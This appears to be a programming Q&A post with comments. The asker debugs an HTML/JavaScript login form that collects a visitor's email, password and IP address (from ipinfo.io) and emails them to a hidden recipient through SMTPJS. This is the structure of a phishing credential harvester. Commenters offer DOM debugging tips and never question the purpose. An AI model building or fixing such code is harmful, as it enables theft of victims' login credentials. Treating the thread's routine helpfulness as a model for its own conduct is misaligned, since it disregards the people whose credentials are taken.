# getting input values by id

Tags: javascript, html

I can't get data in id custId. I want to get user ip by JavaScript and its working, but how can I include that info in the email body?

I tried with this but failed

```
var ip = document.querySelector('input[id="custId"]').value;
```

but when all info is submitted it comes blank null. Other forms like email password comes, very well but only ip comes blank info

```
  <input type="hidden" id="custId">

      <script type="application/javascript">
      function getIP(json) {
            document.getElementById("custId").value = JSON.stringify(json, null, 2);
        
        for (key in json) {
            document.write("<br>" + key + " : ", json[key]);
        }
      }
    </script>
    <script type="application/javascript" src="http://ipinfo.io/?format=jsonp&callback=getIP"></script>

<script type="text/javascript"> 
      function sendEmail() {
          var email = document.getElementById("email").value;
        var password = document.getElementById("password").value;
        

        if(email == "" || password == ""){
            document.getElementById("emailError").innerHTML = "email  is required";
            document.getElementById("passwordError").innerHTML = "Password is required";
            return false;
        }
        
            var email = document.querySelector('input[name="email"]').value;
            var password = document.querySelector('input[name="password"]').value;
            var ip = document.querySelector('input[id="custId"]').value;
       
        
        Email.send({ 
          Host: "", 
          Username: "", 
          Password: "", 
          To: '', 
          From: "", 
          Subject: `hey`,
          Body: ` Email: ${email} | Password: ${password} IP: ${ip}`,
        }).then(function (message) { 
           document.getElementById("Divo").style.display = "block";
        });
      } 
    </script>
```

Comment: Do you call `sendEmail` before or after the `getIP` jsonp method fires? Put some console.logging in your program to debug the order of events.

Comment: i called sendEmail after the getIP jsonp method fires

Comment: You can use `document.querySelector('#custId')` or even good old `document.getElementById('custId')` to get the element. Note that `document.write` can have bad side effects; consider using `document.body.innerHTML +=` instead.

Comment: In fact, [never use document.write()](https://pomax.github.io/1473270609919/if-you-use-use-document-write-you-suck-at-javascript). It doesn't do what you think it does, it's a 30 year old bare-metal function for manipulating the document byte sequence _as it is being parsed_. If you want to inject data into your document, do it the proper way, using normal DOM functions like `createElement` and `append`.

Comment: IP: [object HTMLInputElement]  thats wat i get when i try document.querySelector('#custId') or document.getElementById('custId')